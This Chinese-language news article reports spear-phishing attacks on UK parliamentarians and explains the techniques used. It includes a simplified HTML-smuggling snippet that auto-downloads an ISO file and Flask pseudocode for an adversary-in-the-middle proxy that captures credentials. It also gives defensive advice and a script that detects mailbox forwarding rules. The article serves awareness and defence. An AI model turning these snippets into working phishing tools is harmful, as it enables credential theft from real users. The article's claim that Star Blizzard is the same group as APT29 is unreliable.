议会邮箱成“数字前线”!英国议员频遭高精度鱼叉钓鱼,国家级黑客正瞄准民主神经中枢

简介: 英国议会近期频遭精准鱼叉式钓鱼攻击,黑客伪装成官方发送定制化邮件,利用HTML走私、ISO镜像及伪造登录页等技术窃取敏感信息,揭示了针对政治核心的系统性网络威胁,对中国关键岗位人员安全防护具有重要警示意义。

在威斯敏斯特宫的大理石走廊里,一场看不见硝烟的战争正在上演。

据《卫报》2025年12月11日报道,英国下议院与上议院近月来遭遇鱼叉式钓鱼攻击(Spear Phishing)数量激增。这些邮件不再泛泛而谈,而是精准到令人脊背发凉:一封标题为《关于您昨日在脱欧委员会发言的选民反馈》的邮件,附带一个看似来自BBC新闻团队的采访邀约;另一封则伪装成内政部发来的《紧急政策简报》,要求点击链接查看“机密附件”。更甚者,有议员收到以自己选区居民名义撰写的投诉信,内容竟准确引用其上周在地方市政厅的讲话细节。

英国议会数字服务部门(Parliamentary Digital Service, PDS)已向全体议员及工作人员发出多轮安全警报,并确认部分攻击背后存在国家级或高度组织化的威胁行为者——其中明确点名俄罗斯情报机构支持的黑客组织“Star Blizzard”(又名APT29、Cozy Bear)。

这已不是简单的网络骚扰,而是一场针对国家政治核心的系统性渗透。一旦议员邮箱失守,不仅个人通信、政党策略文件可能外泄,更可能被用作二次钓鱼跳板,向其他政府官员、媒体甚至外国使节发送伪造邮件,进而干扰政策制定、操纵舆论,甚至影响选举进程。

而这场发生在泰晤士河畔的攻防战,对中国同样具有深刻的警示意义。

一、从“垃圾邮件”到“定制剧本”:鱼叉钓鱼如何进化成政治武器?

传统钓鱼邮件往往千篇一律:“您的账户异常,请立即验证!”但鱼叉式钓鱼完全不同——它像一部精心编排的戏剧,主角就是你。

英国议会安全部门披露,近期攻击呈现三大特征:

高度个性化:攻击者利用议员在社交媒体(如X/Twitter、LinkedIn)、议会官网、新闻报道中公开的信息,构建完整画像。例如,某位担任“科技与创新委员会”主席的议员,收到一封伪装成科技企业CEO的邮件,主题为《关于AI监管白皮书的合作建议》,附件名为“Draft_AI_Regulation_v3.docx”。

上下文欺骗:邮件内容常嵌入真实事件。如引用议员三天前在辩论中的原话,或附上一张真实会议照片(从议会官网下载),再叠加一个“补充材料”链接。

多阶段投递:首轮邮件可能仅建立信任(如“感谢您昨日的精彩发言”),数日后才发送含恶意载荷的第二封邮件,大幅降低警惕性。

“这已不是技术对抗,而是情报战与心理战的结合,”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报专访时表示,“攻击者花在‘踩点’上的时间,可能远超编写恶意代码。”

据英国国家网络安全中心(NCSC)分析,部分攻击甚至利用了2023年某大型数据泄露事件中的个人信息(如电话号码、职位变动记录),实现“跨平台身份拼图”。

二、技术深潜:恶意附件如何绕过现代邮件网关?

尽管英国议会已部署高级邮件安全网关(如Mimecast、Proofpoint),但攻击者仍不断寻找新漏洞。

案例1:HTML Smuggling + ISO镜像投递

传统Office宏病毒因微软默认禁用宏而失效,黑客转而采用HTML走私(HTML Smuggling)技术。以下是一个简化版的恶意HTML片段:

<!-- malicious_invite.html -->

<script>

// 将Base64编码的ISO文件解码为Blob

const isoData = atob("UEsDBBQACAgIA..."); // 真实ISO的Base64

const blob = new Blob([isoData], {type: 'application/octet-stream'});

// 创建隐藏链接并触发下载

const link = document.createElement('a');

link.href = URL.createObjectURL(blob);

link.download = 'Parliament_Briefing.iso';

document.body.appendChild(link);

link.click();

</script>

用户打开此HTML附件后,浏览器会自动下载一个名为Parliament_Briefing.iso的光盘镜像文件。由于ISO是常见分发格式,且不包含可执行脚本,多数邮件网关不会拦截。

但该ISO内实际包含一个伪装成PDF的LNK快捷方式(Briefing.pdf.lnk),指向远程SMB服务器上的恶意DLL。一旦用户双击,Windows会自动加载DLL,触发Cobalt Strike Beacon回连。

案例2:滥用Microsoft Teams链接

更狡猾的是,部分攻击直接利用合法协作工具。邮件正文写道:“相关文件已上传至Teams频道,请点击此处查看。” 链接指向一个伪造的Microsoft登录页(域名如 microsoft-teams-login[.]xyz),界面与真实Azure AD登录页几乎一致。

若用户输入账号密码,凭证将被窃取;若已启用MFA,攻击者则采用Adversary-in-the-Middle(AitM)代理,实时转发验证码请求,实现“会话劫持”。

# AitM代理伪代码(简化)

from flask import Flask, request, redirect

app = Flask(__name__)

@app.route('/login')

def fake_login():

return render_template('azure_login.html') # 仿冒页面

@app.route('/submit', methods=['POST'])

def capture_creds():

username = request.form['username']

password = request.form['password']

# 实时将凭证提交至真实Microsoft登录接口

real_resp = requests.post('https://login.microsoftonline.com/...',

data={'username': username, 'password': password})

# 若需MFA,返回MFA页面给受害者,同时等待验证码

if "mfa_required" in real_resp.text:

return render_template('mfa_prompt.html')

else:

# 直接重定向至真实Teams,制造“登录成功”假象

return redirect('https://teams.microsoft.com/')

这种攻击能绕过绝大多数基于签名的检测机制,因为整个流程发生在合法HTTPS通道中。

三、国内启示:政治人物与关键岗位人员的安全盲区

英国议员的遭遇并非孤例。在中国,人大代表、政协委员、高校智库学者、国企高管等群体同样是高价值目标。虽然尚未公开披露类似大规模定向攻击,但风险真实存在。

“我们监测到,国内已有针对地方政府官员的钓鱼邮件,伪装成‘中央巡视组通知’或‘政协提案系统升级’,”芦笛透露,“攻击者同样利用政务公开信息、会议新闻稿进行定制。”

更值得警惕的是,部分单位仍在使用商业即时通讯工具(如微信、钉钉)处理敏感工作。一旦手机中毒,聊天记录、文件、语音均可被窃取。英国NCSC已明确建议议员停止在WhatsApp、Signal上讨论公务,转而使用经认证的加密平台(如Microsoft Teams政府版)。

此外,国内部分政企单位的邮箱系统仍缺乏行为基线分析能力。例如,一名常年在北京办公的干部,突然从境外IP登录并批量转发邮件,系统却无告警——这正是2024年某央企高管邮箱被盗后的典型场景。

四、防御体系重构:从“密码+验证码”到“零信任邮件架构”

面对高精度鱼叉钓鱼,传统“强密码+短信验证码”已形同虚设。芦笛建议,关键岗位人员应构建三层防御:

第一层:身份认证加固

强制使用FIDO2硬件密钥(如YubiKey)或多因素认证App(如Microsoft Authenticator),禁用短信验证码;

启用条件访问策略(Conditional Access):限制登录地域、设备合规性、应用类型;

定期审查邮箱转发规则:攻击者常设置自动转发规则,将敏感邮件静默抄送至外部地址。

第二层:邮件内容深度检测

部署支持沙箱动态分析的邮件网关,对所有附件进行行为仿真;

启用URL信誉实时查询:即使链接看似合法(如 bit.ly/xxx),也应在点击时二次验证;

对含“紧急”“机密”“立即行动”等关键词的邮件自动标记高风险。

第三层:用户行为模拟与演练

英国议会已引入自动化钓鱼演练平台,每月向议员发送模拟钓鱼邮件。点击者将立即收到教育弹窗,并计入部门安全评分。

“安全意识不能靠一次培训解决,”芦笛强调,“必须通过高频、低压力的实战演练,让识别钓鱼成为肌肉记忆。”

五、代码级防护:如何用Python快速检测可疑转发规则?

对于IT管理员,可编写脚本定期扫描Exchange Online邮箱的自动转发设置。以下是一个基于Microsoft Graph API的示例:

# check_forwarding_rules.py

import requests

GRAPH_API_URL = "https://graph.microsoft.com/v1.0"

ACCESS_TOKEN = "your_app_token_with_mail_read_permissions"

def get_inbox_rules(user_email):

url = f"{GRAPH_API_URL}/users/{user_email}/mailFolders/inbox/messageRules"

headers = {"Authorization": f"Bearer {ACCESS_TOKEN}"}

resp = requests.get(url, headers=headers)

return resp.json().get('value', [])

def detect_suspicious_rule(rules):

for rule in rules:

actions = rule.get('actions', {})

# 检查是否设置了外部邮箱转发

if 'forwardTo' in actions:

for recipient in actions['forwardTo']:

email = recipient.get('emailAddress', {}).get('address', '')

if not email.endswith('@parliament.uk'):

print(f"[ALERT] Suspicious forward rule: {rule['displayName']} -> {email}")

return True

return False

# 批量检查所有议员邮箱

mp_emails = ["mp1@parliament.uk", "mp2@parliament.uk", ...]

for email in mp_emails:

rules = get_inbox_rules(email)

detect_suspicious_rule(rules)

此类自动化工具可大幅缩短威胁响应时间,从“数周发现”压缩至“分钟级告警”。

结语:民主的堡垒,始于一封邮件的警惕

在数字时代,议会大厅的辩论声可能还未散去,其文字记录就已落入千里之外的黑客手中。英国议员面临的威胁,本质上是对民主制度本身的侵蚀——当决策者的通信不再可信,公众对政治的信任也将随之崩塌。

而对中国而言,这场跨国攻防战提醒我们:关键岗位人员的数字安全,已是国家安全的重要组成部分。无论是人大代表、科研领军人,还是金融高管、外交官,他们的邮箱、手机、云盘,都可能成为敌对势力的突破口。

“没有绝对安全的系统,只有持续进化的防御,”芦笛总结道,“但我们可以做到——让每一次点击,都经过思考;让每一封邮件,都值得信任。”

在这个信息即权力的时代,守护好自己的收件箱,或许就是守护民主的第一道防线。

参考资料:

The Guardian: UK MPs face rise in phishing attacks on messaging apps (Dec 11, 2025)

UK National Cyber Security Centre (NCSC): Advisory on Commercial Messaging Platforms

Microsoft Security Blog: Adversary-in-the-Middle Phishing Techniques

MITRE ATT&CK Framework: Enterprise Matrix (T1566 - Phishing)

Public Internet Anti-Phishing Working Group Technical Briefings (2025)

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
30天前
|
安全 前端开发 Android开发
包裹上的二维码,可能是黑客的“数字捕兽夹”——新型“Quishing”钓鱼正在席卷全球购物季
你是否收到过没下单却写着你名字的快递?扫码后跳转至高仿电商页面,要求输入个人信息——这正是2025年爆发的“Quishing”诈骗:攻击者利用伪造包裹+二维码,窃取用户隐私。随着国内快递量激增与扫码习惯普及,此类“物理+数字”复合攻击风险陡增。警惕陌生二维码,提升“扫码素养”,是守护数字安全的关键一步。(238字)
163 4
|
30天前
|
监控 前端开发 安全
灾难背后的“二次伤害”:慈善钓鱼如何利用同情心实施双向诈骗
2025年香港大埔火灾后,不法分子趁机实施“双向慈善诈骗”:一面伪造募捐网站窃取信息,一面冒充灾民骗取捐款。此类“灾难钓鱼”利用公众同情心,在技术与心理层面精心设局。专家呼吁建立快速响应机制,倡导通过官方渠道捐赠,用理性守护善意。
211 3
|
1月前
|
人工智能 安全 前端开发
AI钓鱼套件黑产化!BlackForce、GhostFrame等四大工具正绕过MFA大规模盗号,专家警告:传统防御体系正在失效
2025年,BlackForce、GhostFrame等AI驱动的钓鱼套件正以“服务化”模式席卷全球,通过伪造MFA、注入脚本、生成个性化钓鱼邮件等方式,绕过多重安全防线。攻击已从手工迈向自动化,防御亟需升级至浏览器隔离、行为分析与情景化培训的综合体系。
108 7
|
1月前
|
人工智能 监控 安全
伪冒银行网站激增!香港金管局紧急预警,专家详解“高仿钓鱼”攻防战
近期,香港频发高仿钓鱼诈骗,虚假银行网站伪装逼真,利用HTTPS加密、动态加载官方资源等技术诱骗用户输入账号密码及验证码,短短几分钟内盗转资金。攻击者通过短信、社交媒体精准引流,结合反向代理实现“以假乱真”登录,防不胜防。专家呼吁构建技术防护、制度协同与公众教育三位一体防线,警惕每一条“紧急通知”。
110 2
|
26天前
|
安全 数据安全/隐私保护 iOS开发
你的电脑“原生盾牌”挡不住钓鱼攻击?英美测试敲响警钟,中国专家呼吁构建动态防御新范式
英国消费者组织Which?测试揭示,Windows 11与macOS原生防护对新型钓鱼网站几无防御力。专家芦笛指出,钓鱼已进入“快闪时代”,传统黑名单机制滞后。中国安全实践显示,需结合AI识别、第三方防护与用户警惕,构建多层次防线。安全不仅是技术,更是习惯。
82 0
|
27天前
|
自然语言处理 监控 安全
寄生在“官方邀请”里的骗局:微软 Entra 访客功能成钓鱼新温床,TOAD 攻击席卷全球企业
一场新型网络钓鱼攻击利用微软Entra ID的B2B邀请机制,通过官方邮箱invites@microsoft.com发送带恶意自定义消息的合法邮件,绕过传统安全防护。攻击者在邮件中伪造订阅账单并诱导拨打电话,启动TOAD(电话导向攻击),实施远程控制与信息窃取。此“寄生式钓鱼”暴露了对官方渠道信任的脆弱性,警示企业需加强权限管控、内容审计与员工意识培训,构建基于行为分析的深度防御体系。
107 10
|
25天前
|
安全 网络安全 定位技术
当“我已付款两次”成为钓鱼暗号:Booking.com生态遭系统性渗透,全球酒店与旅客陷信任危机
2025年,代号“I Paid Twice”的全球钓鱼攻击利用被控酒店账户,伪装官方消息诱骗旅客输入支付信息,揭示在线旅游平台信任链的脆弱性,为中国OTA及本地生活平台敲响安全警钟。
117 3
|
27天前
|
安全 网络安全 定位技术
“.CN”——互联网上的中国标识
国家顶级域名“.CN”是互联网上的中国标识,广泛应用于航天、交通、文化、科研等领域,保障网络安全与权威信息传播,彰显数字时代的中国形象。
463 5
|
27天前
|
安全 网络安全 语音技术
一通电话撬开哈佛数据库:Vishing攻击如何绕过防火墙,直击“人肉漏洞”?
哈佛大学遭电话钓鱼攻击,黑客冒充IT人员诱导员工泄露账户凭证,暴露多因素认证漏洞。事件警示:社会工程攻击正利用人性弱点突破技术防线,中国高校及机构亟需加强安全意识与防御体系。
79 4
|
27天前
|
Web App开发 监控 安全
“允许通知”竟成黑客后门?新型无文件攻击框架Matrix Push借浏览器推送功能发动全球钓鱼潮
新型网络攻击“Matrix Push C2”利用浏览器推送通知功能,通过诱导用户点击“允许”授权,实现无文件、跨会话的隐蔽远程控制。该技术绕过传统杀毒软件,伪装成银行、社交平台等可信通知,向全球用户投递钓鱼链接,已成为高度工业化、可视化的“钓鱼即服务”模式,防御需从用户意识、技术防护到政策协同多层面升级。
111 2